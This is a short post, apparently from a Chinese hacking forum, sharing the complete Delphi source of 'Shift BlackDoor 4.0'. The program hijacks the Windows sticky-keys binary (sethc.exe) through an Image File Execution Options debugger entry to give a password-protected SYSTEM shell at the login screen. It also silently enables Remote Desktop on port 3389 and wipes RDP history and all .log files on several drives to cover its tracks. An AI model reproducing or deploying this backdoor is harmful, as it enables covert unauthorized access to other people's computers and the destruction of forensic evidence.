共享下我的Shift后门

Shift, 后门

program shiftBlackdoor;
{$APPTYPE CONSOLE}
uses
windows,registry,shellapi;
const
password='adminhy'; //c32asm OK!
var
shiftvalue:integer;
procedure shift;
var
system:array[0..255]of char;
mefile: array[0..MAX_PATH] of Char;
key:Tregistry;
begin
GetModuleFileName(0, mefile, Length(mefile));
getsystemdirectory(system,255);
Copyfile(mefile,pchar(system+'\ntcsx.bat'),true);
if shiftvalue=1 then
begin
key:=tregistry.Create;
getsystemdirectory(system,255);
try
key.RootKey:=HKEY_LOCAL_MACHINE;
key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
key.DeleteKey('sethc.exe');
key.CreateKey('sethc.EXE');
key.OpenKey('sethc.exe',false);
key.WriteString('Debugger',system+'\ntcsx.bat');
key.CloseKey;
key.Free;
except
else
writeln('Setup Door Error!');
sleep(1000*60*800);
writeln;
end
end
else
if shiftvalue=2 then
begin
try
key:=Tregistry.Create;
key.RootKey:=HKEY_LOCAL_MACHINE;
key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
key.DeleteKey('sethc.exe');
Messagebox(0,'Clear OK!','Message',MB_iconEXClamation);
finally
end;
end;
end;
Procedure Open3389;//开3389
var
bat:textfile;
begin
assignfile(bat,'C:\3389.bat');
try
rewrite(bat);
writeln(bat,'@echo off');
writeln(bat,'@echo Windows Registry Editor Version 5.00>>3389.reg');
writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg');
writeln(bat,'@echo "fDenyTSConnections"=dword:00000000>>3389.reg');
writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg');
writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg');
writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
writeln(bat,'@regedit /s 3389.reg');
writeln(bat,'@del 3389.reg');
finally
Closefile(bat);
end;
winexec('C:\3389.bat',SW_hide);
end;
procedure clearlogs; //清除部分日志
var
bat:textfile;
begin
try
Deletefile('C:\3389.bat');
assignfile(bat,'C:\clear.bat');
rewrite(bat);
writeln(bat,'@echo off');
writeln(bat,'@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f');
writeln(bat,'@del "%USERPROFILE%\My Documents\Default.rdp" /a');
writeln(bat,'@echo Clear 3389LOG Success.');
writeln(bat,'Clear Temp Log.');
writeln(bat,'@del C:\*.log /q /s /f');
writeln(bat,'@del D:\*.log /q /s /f');
writeln(bat,'@del E:\*.log /q /s /f');
writeln(bat,'@del F:\*.log /q /s /f');
writeln(bat,'@del %0');
finally
closefile(bat);
winexec('c:\clear.bat',SW_hide);
end;
end;
procedure mem;//功能
var
gl:integer;
begin
writeln('===================================================================');
writeln(' 1.CMD.EXE. 2.EXPLORER.EXE. 3.Clear LOGS. 4.Clear Door. 5.About.');
writeln('===================================================================');
writeln;
write('>>');
read(gl);
writeln('OK...');
if gl=1 then
begin
winexec('cmd.exe /c cls',SW_show);
winexec('cmd.exe',SW_show);
halt;
end
else
if gl=2 then
begin
winexec('explorer.exe',SW_show);
halt;
end
else
if gl=3 then
begin
clearlogs;
sleep(1000*60*1996);
end
else
if gl=4 then
begin
shiftvalue:=2;
shift;
exit;
end
else
if gl=5 then
begin
readln;
writeln('======================Shift Door About========================');
writeln;
writeln('Shift BlackDoor 4.0');
writeln('BY:Hyrz');
writeln('E-mail:bsoom@163.com');
writeln;
writeln('===============================END=========================== ');
readln;
exit;
end
else
readln;
writeln('Command Error!');
readln;
clearlogs;
end;
///////////////////////////Main/////////////////////////////
var
pass:string;
begin
shiftvalue:=1;
shift;
open3389;
begin
writeln('===============================');
write('Password:');read(pass);
if (pass=password) then
begin
writeln;
mem;
exit;
end
else
writeln;
writeln('Password Error!');
writeln;
writeln('Bye..Bye...');
sleep(2000);
end;
end.